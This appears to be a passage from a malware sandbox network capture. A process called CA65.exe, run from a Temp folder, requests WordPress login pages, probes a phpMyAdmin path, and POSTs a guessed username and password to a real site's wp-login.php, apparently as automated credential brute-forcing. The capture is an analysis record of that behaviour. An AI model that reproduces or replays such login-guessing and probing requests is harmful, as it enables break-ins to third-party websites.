window.dataLayer = window.dataLayer \|\| []; function gtag() { dataLayer.push(arguments);

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
257	192.168.2.4	52083	104.21.52.80	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:08 UTC	164	OUT	GET / HTTP/1.1 Host: cannaclear.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:08 UTC	936	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Access-Control-Allow-Origin: * Cache-Control: max-age=0 Expires: Fri, 22 Dec 2023 20:15:08 GMT Last-Modified: Fri, 22 Dec 2023 20:11:00 GMT Vary: X-Forwarded-Proto,Accept-Encoding,User-Agent Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xaaBnRIbusTi08NPgRgoR72MBVzRtnmyO90IZ8J5frJ0ctNFq7dVguq%2FEKl%2F6qKDcevsSNUXERLpBh0HjHs2s5w%2B1ChwVQ88%2FpjWXMn%2FUPSuobvruDx3LpgvI1l8FEKGbQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} expect-ct: max-age=86400, enforce referrer-policy: same-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Server: cloudflare CF-RAY: 839b08fc1a46333d-MIA alt-svc: h3=":443"; ma=86400
2023-12-22 20:15:08 UTC	433	IN	Data Raw: 64 36 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 63 6c 61 73 73 3d 22 6c 6f 61 64 69 6e 67 2d 73 69 74 65 20 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 68 74 6d 6c 29 7b 68 74 6d 6c 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 68 74 6d 6c 2e 63 6c 61 73 73 4e 61 6d 65 2e 72 65 70 6c 61 63 65 28 2f 5c 62 6e 6f Data Ascii: d61<!DOCTYPE html><html lang="en-US" prefix="og: https://ogp.me/ns#" class="loading-site no-js"><head><meta charset="UTF-8" /><link rel="profile" href="https://gmpg.org/xfn/11" /><script>(function(html){html.className = html.className.replace(/\bno
2023-12-22 20:15:08 UTC	1369	IN	Data Raw: 20 43 61 6e 6e 61 43 6c 65 61 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 42 75 6c 6b 20 44 65 6c 74 61 2d 38 20 54 48 43 20 70 72 6f 64 75 63 74 73 20 61 74 20 75 6e 62 65 61 74 61 62 6c 65 20 70 72 69 63 65 73 2e 20 42 75 79 20 44 65 6c 74 61 20 38 20 54 48 43 20 4f 69 6c 2c 20 44 38 20 56 61 70 65 73 2c 20 48 48 43 2c 20 54 48 43 2d 4f 2c 20 48 48 43 2d 4f 20 61 6e 64 20 6f 74 68 65 72 20 63 61 6e 6e 61 62 69 6e 6f 69 64 73 20 6f 6e 6c 69 6e 65 2e 20 53 68 6f 70 20 6e 6f 77 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 66 6f 6c 6c 6f 77 2c 20 69 6e 64 65 78 2c 20 6d 61 78 2d 73 6e 69 70 70 65 74 3a 2d 31 2c Data Ascii: CannaClear</title><meta name="description" content="Bulk Delta-8 THC products at unbeatable prices. Buy Delta 8 THC Oil, D8 Vapes, HHC, THC-O, HHC-O and other cannabinoids online. Shop now!" /><meta name="robots" content="follow, index, max-snippet:-1,
2023-12-22 20:15:08 UTC	1369	IN	Data Raw: 64 5f 64 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 32 30 32 30 2d 31 31 2d 30 35 45 53 54 30 37 3a 30 34 3a 34 37 2d 30 35 3a 30 30 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 79 61 3a 6f 76 73 3a 61 6c 6c 6f 77 5f 65 6d 62 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 66 61 6c 73 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 42 75 79 20 44 65 6c 74 61 20 38 20 54 48 43 20 7c 20 42 75 79 20 44 65 6c 74 61 2d 38 20 54 48 43 20 42 75 6c 6b 20 44 69 73 74 69 6c 6c 61 74 65 20 4f 6e 6c 69 6e 65 Data Ascii: d_date" content="2020-11-05EST07:04:47-05:00" /><meta property="ya:ovs:allow_embed" content="false" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="Buy Delta 8 THC \| Buy Delta-8 THC Bulk Distillate Online
2023-12-22 20:15:08 UTC	261	IN	Data Raw: 20 69 64 3d 22 77 63 2d 61 75 74 68 6f 72 69 7a 65 2d 6e 65 74 2d 63 69 6d 2d 63 68 65 63 6b 6f 75 74 2d 62 6c 6f 63 6b 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 2f 31 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 67 61 74 65 77 61 79 2d 61 75 74 68 6f 72 69 7a 65 2d 6e 65 74 2d 63 69 6d 2f 61 73 73 65 74 73 2f 63 73 73 2f 62 6c 6f 63 6b 73 2f 77 63 2d 61 75 74 68 6f 72 69 7a 65 2d 6e 65 74 2d 63 69 6d 2d 63 68 65 63 6b 6f 75 74 2d 62 6c 6f 63 6b 2e 63 73 73 3f 76 65 72 3d 31 37 30 33 30 30 31 38 31 37 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c Data Ascii: id="wc-authorize-net-cim-checkout-block-css" href="https://cannaclear.com/wp-content/cache/min/1/wp-content/plugins/woocommerce-gateway-authorize-net-cim/assets/css/blocks/wc-authorize-net-cim-checkout-block.css?ver=1703001817" type="text/css" media="all
2023-12-22 20:15:08 UTC	1369	IN	Data Raw: 34 30 36 65 0d 0a 0a 3c 6c 69 6e 6b 20 64 61 74 61 2d 6d 69 6e 69 66 79 3d 22 31 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 73 6d 61 72 74 5f 72 65 66 75 6e 64 65 72 5f 66 6f 6e 74 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 2f 31 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 73 6d 61 72 74 2d 72 65 66 75 6e 64 65 72 2f 61 73 73 65 74 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 31 37 30 33 30 30 31 38 31 37 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 Data Ascii: 406e<link data-minify="1" rel="stylesheet" id="smart_refunder_font-css" href="https://cannaclear.com/wp-content/cache/min/1/wp-content/plugins/woocommerce-smart-refunder/assets/font-awesome/css/font-awesome.min.css?ver=1703001817" type="text/css" media
2023-12-22 20:15:08 UTC	1369	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 64 61 72 6b 65 72 2d 32 30 3a 23 30 30 35 61 38 37 3b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 74 68 65 6d 65 2d 63 6f 6c 6f 72 2d 64 61 72 6b 65 72 2d 32 30 2d 2d 72 67 62 3a 30 2c 39 30 2c 31 33 35 3b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 62 6f 72 64 65 72 2d 77 69 64 74 68 2d 66 6f 63 75 73 3a 32 70 78 3b 2d 2d 77 70 2d 62 6c 6f 63 6b 2d 73 79 6e 63 65 64 2d 63 6f 6c 6f 72 3a 23 37 61 30 30 64 66 3b 2d 2d 77 70 2d 62 6c 6f 63 6b 2d 73 79 6e 63 65 64 2d 63 6f 6c 6f 72 2d 2d 72 67 62 3a 31 32 32 2c 30 2c 32 32 33 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 3a 72 6f 6f 74 7b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 62 6f 72 64 65 72 2d 77 69 64 74 68 2d 66 6f 63 75 73 3a 31 2e 35 70 78 7d 7d 2e 77 70 2d Data Ascii: -color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px;--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.wp-
2023-12-22 20:15:08 UTC	1369	IN	Data Raw: 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6e 6f 72 6d 61 6c 29 7d 2e 68 61 73 2d 68 75 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 68 75 67 65 29 7d 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 6c 65 66 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 23 65 6e 64 2d 72 65 73 69 7a 61 62 6c 65 2d 65 64 Data Ascii: ont-size{font-size:var(--wp--preset--font-size--normal)}.has-huge-font-size{font-size:var(--wp--preset--font-size--huge)}.has-text-align-center{text-align:center}.has-text-align-left{text-align:left}.has-text-align-right{text-align:right}#end-resizable-ed
2023-12-22 20:15:08 UTC	1369	IN	Data Raw: 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 5d 29 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 77 69 64 74 68 5d 29 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 77 69 64 74 68 5d 29 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 62 6f 72 64 65 72 2d 6c 65 66 74 2d 77 69 64 74 68 5d 29 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 69 6d 67 5b 63 Data Ascii: rder-top-width]){border-top-style:solid}html :where([style=border-right-width]){border-right-style:solid}html :where([style=border-bottom-width]){border-bottom-style:solid}html :where([style*=border-left-width]){border-left-style:solid}html :where(img[c
2023-12-22 20:15:08 UTC	1369	IN	Data Raw: 2f 63 73 73 2f 6c 77 73 5f 69 63 6f 6e 73 2e 63 73 73 3f 76 65 72 3d 31 37 30 33 30 30 31 38 31 37 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 64 61 74 61 2d 6d 69 6e 69 66 79 3d 22 31 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 77 6f 6f 72 65 77 61 72 64 73 2d 66 72 65 65 2d 70 72 6f 64 75 63 74 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 2f 31 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6c 77 73 2f 6c 77 73 5f 77 6f 6f 72 65 77 61 72 64 73 5f 66 72 65 65 5f 70 72 6f 64 75 63 74 5f 74 65 6d 70 6c 61 74 65 2d 63 61 63 68 65 64 2e Data Ascii: /css/lws_icons.css?ver=1703001817" type="text/css" media="all" /><link data-minify="1" rel="stylesheet" id="woorewards-free-product-css" href="https://cannaclear.com/wp-content/cache/min/1/wp-content/cache/lws/lws_woorewards_free_product_template-cached.
2023-12-22 20:15:08 UTC	1369	IN	Data Raw: 6c 65 73 68 65 65 74 22 20 69 64 3d 22 73 76 2d 77 63 2d 70 61 79 6d 65 6e 74 2d 67 61 74 65 77 61 79 2d 70 61 79 6d 65 6e 74 2d 66 6f 72 6d 2d 76 35 5f 31 32 5f 30 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 67 61 74 65 77 61 79 2d 61 75 74 68 6f 72 69 7a 65 2d 6e 65 74 2d 63 69 6d 2f 76 65 6e 64 6f 72 2f 73 6b 79 76 65 72 67 65 2f 77 63 2d 70 6c 75 67 69 6e 2d 66 72 61 6d 65 77 6f 72 6b 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2f 70 61 79 6d 65 6e 74 2d 67 61 74 65 77 61 79 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 72 6f 6e 74 65 6e 64 2f 73 76 2d 77 63 2d 70 61 79 6d 65 6e 74 2d 67 61 74 65 77 61 79 2d 70 61 Data Ascii: lesheet" id="sv-wc-payment-gateway-payment-form-v5_12_0-css" href="https://cannaclear.com/wp-content/plugins/woocommerce-gateway-authorize-net-cim/vendor/skyverge/wc-plugin-framework/woocommerce/payment-gateway/assets/css/frontend/sv-wc-payment-gateway-pa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
258	192.168.2.4	52089	209.124.80.122	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:08 UTC	230	OUT	GET /wp-login.php?redirect_to=https%3A%2F%2Fcicfl.com%2Fwp-admin%2F&reauth=1 HTTP/1.1 Host: cicfl.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:08 UTC	2373	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:08 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/; secure Set-Cookie: wordpress_97eb4285f5cb104fda3025787a2c272c=+; expires=Thu, 22-Dec-2022 20:15:08 GMT; Max-Age=0; path=/wp-admin Set-Cookie: wordpress_sec_97eb4285f5cb104fda3025787a2c272c=+; expires=Thu, 22-Dec-2022 20:15:08 GMT; Max-Age=0; path=/wp-admin Set-Cookie: wordpress_97eb4285f5cb104fda3025787a2c272c=+; expires=Thu, 22-Dec-2022 20:15:08 GMT; Max-Age=0; path=/wp-content/plugins Set-Cookie: wordpress_sec_97eb4285f5cb104fda3025787a2c272c=+; expires=Thu, 22-Dec-2022 20:15:08 GMT; Max-Age=0; path=/wp-content/plugins Set-Cookie: wordpress_logged_in_97eb4285f5cb104fda3025787a2c272c=+; expires=Thu, 22-Dec-2022 20:15:08 GMT; Max-Age=0; path=/ Set-Cookie: wordpress_logged_in_97eb4285f5cb104fda3025787a2c272c=+; expires=Thu, 22-Dec-2022 20:15:08 GMT; Max-Age=0; path=/ Set-Cookie: wp-settings-0=+; expires=Thu, 22-Dec-2022 20:15:08 GMT; Max-Age=0; path=/ Set-Cookie: wp-settings-time-0=+; expires=Thu, 22-Dec-2022 20:15:08 GMT; Max-Age=0; path=/ Set-Cookie: wordpress_97eb4285f5cb104fda3025787a2c272c=+; expires=Thu, 22-Dec-2022 20:15:08 GMT; Max-Age=0; path=/ Set-Cookie: wordpress_97eb4285f5cb104fda3025787a2c272c=+; expires=Thu, 22-Dec-2022 20:15:08 GMT; Max-Age=0; path=/ Set-Cookie: wordpress_sec_97eb4285f5cb104fda3025787a2c272c=+; expires=Thu, 22-Dec-2022 20:15:08 GMT; Max-Age=0; path=/ Set-Cookie: wordpress_sec_97eb4285f5cb104fda3025787a2c272c=+; expires=Thu, 22-Dec-2022 20:15:08 GMT; Max-Age=0; path=/ Set-Cookie: wordpressuser_97eb4285f5cb104fda3025787a2c272c=+; expires=Thu, 22-Dec-2022 20:15:08 GMT; Max-Age=0; path=/ Set-Cookie: wordpresspass_97eb4285f5cb104fda3025787a2c272c=+; expires=Thu, 22-Dec-2022 20:15:08 GMT; Max-Age=0; path=/ Set-Cookie: wordpressuser_97eb4285f5cb104fda3025787a2c272c=+; expires=Thu, 22-Dec-2022 20:15:08 GMT; Max-Age=0; path=/ Set-Cookie: wordpresspass_97eb4285f5cb104fda3025787a2c272c=+; expires=Thu, 22-Dec-2022 20:15:08 GMT; Max-Age=0; path=/ Set-Cookie: wp-postpass_97eb4285f5cb104fda3025787a2c272c=+; expires=Thu, 22-Dec-2022 20:15:08 GMT; Max-Age=0; path=/ Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:15:08 UTC	29	IN	Data Raw: 31 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 0d 0a Data Ascii: 17<!DOCTYPE html><html
2023-12-22 20:15:08 UTC	89	IN	Data Raw: 35 33 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 0d 0a Data Ascii: 53lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=
2023-12-22 20:15:08 UTC	102	IN	Data Raw: 36 30 0d 0a 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 43 49 43 46 4c 20 7c 20 43 6f 6d 6d 65 72 63 69 61 6c 20 49 6e 64 75 73 74 72 69 61 6c 20 43 6f 72 70 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 0d 0a Data Ascii: 60UTF-8" /><title>Log In &lsaquo; CICFL \| Commercial Industrial Corp — WordPress</title>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
259	192.168.2.4	52368	13.35.116.12	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:08 UTC	174	OUT	GET /phpMyAdmin HTTP/1.1 Host: www.wika.co.in Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:08 UTC	1149	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Content-Length: 180 Connection: close Date: Fri, 22 Dec 2023 20:15:06 GMT Server: web Location: https://www.wika.com/en-in/phpMyAdmin X-Rewritten-By: ManagedFusion (rewriter; reverse-proxy; +http://managedfusion.com/) X-ManagedFusion-Rewriter-Version: 3.7 X-UA-Compatible: IE=edge strict-transport-security: max-age=31536000; includeSubDomains; Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: ; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline'; Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XXS-Protection: 1; mode=block X-Powered-By: ARR/3.0 X-Cache: Miss from cloudfront Via: 1.1 ce227bc46ff00146ba3cff133667b968.cloudfront.net (CloudFront) X-Amz-Cf-Pop: MIA3-C2 X-Amz-Cf-Id: vFpFIWT_a7ZHWJnucrS3ror-9_GDemmBK9HAoz0wbUPfJVXv2VoBwg==
2023-12-22 20:15:08 UTC	180	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 55 52 49 20 74 68 61 74 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 68 61 73 20 62 65 65 6e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 6b 61 2e 63 6f 6d 2f 65 6e 2d 69 6e 2f 70 68 70 4d 79 41 64 6d 69 6e 22 3e 6d 6f 76 65 64 20 74 6f 20 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Moved Permanently</title></head><body><p>The URI that you requested has been <a href="https://www.wika.com/en-in/phpMyAdmin">moved to here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
260	192.168.2.4	52097	185.162.89.66	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:08 UTC	432	OUT	POST /wp-login.php HTTP/1.1 Host: oceanictrailers.com.au Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://oceanictrailers.com.au/wp-login.php?redirect_to=https%3A%2F%2Foceanictrailers.com.au%2Fwp-admin%2F&reauth=1 Content-Length: 134 Content-Type: application/x-www-form-urlencoded
2023-12-22 20:15:08 UTC	134	OUT	Data Raw: 6c 6f 67 3d 64 61 76 69 64 26 70 77 64 3d 54 72 61 69 6c 65 72 73 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6f 63 65 61 6e 69 63 74 72 61 69 6c 65 72 73 2e 63 6f 6d 2e 61 75 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=david&pwd=Trailers&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Foceanictrailers.com.au%2Fwp-admin%2F&testcookie=1
2023-12-22 20:15:08 UTC	508	IN	HTTP/1.1 200 OK Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure x-frame-options: SAMEORIGIN content-length: 6255 date: Fri, 22 Dec 2023 20:15:08 GMT alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-12-22 20:15:08 UTC	860	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 4f 63 65 61 6e 69 63 20 54 72 61 69 6c 65 72 73 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 72 63 68 69 76 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Oceanic Trailers — WordPress</title><meta name='robots' content='max-image-preview:large, noindex, noarchiv
2023-12-22 20:15:08 UTC	5395	IN	Data Raw: 2e 61 75 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 6f 67 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 65 66 65 72 72 65 72 27 20 63 6f 6e 74 65 6e 74 3d 27 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 27 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6f 63 65 61 6e 69 63 74 72 61 69 6c 65 72 73 2e 63 6f 6d 2e 61 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f Data Ascii: .au/wp-admin/css/login.min.css?ver=6.4.2' media='all' /><meta name='referrer' content='strict-origin-when-cross-origin' /><meta name="viewport" content="width=device-width" /><link rel="icon" href="https://oceanictrailers.com.au/wp-content/uploads/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
261	192.168.2.4	52599	104.21.52.80	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
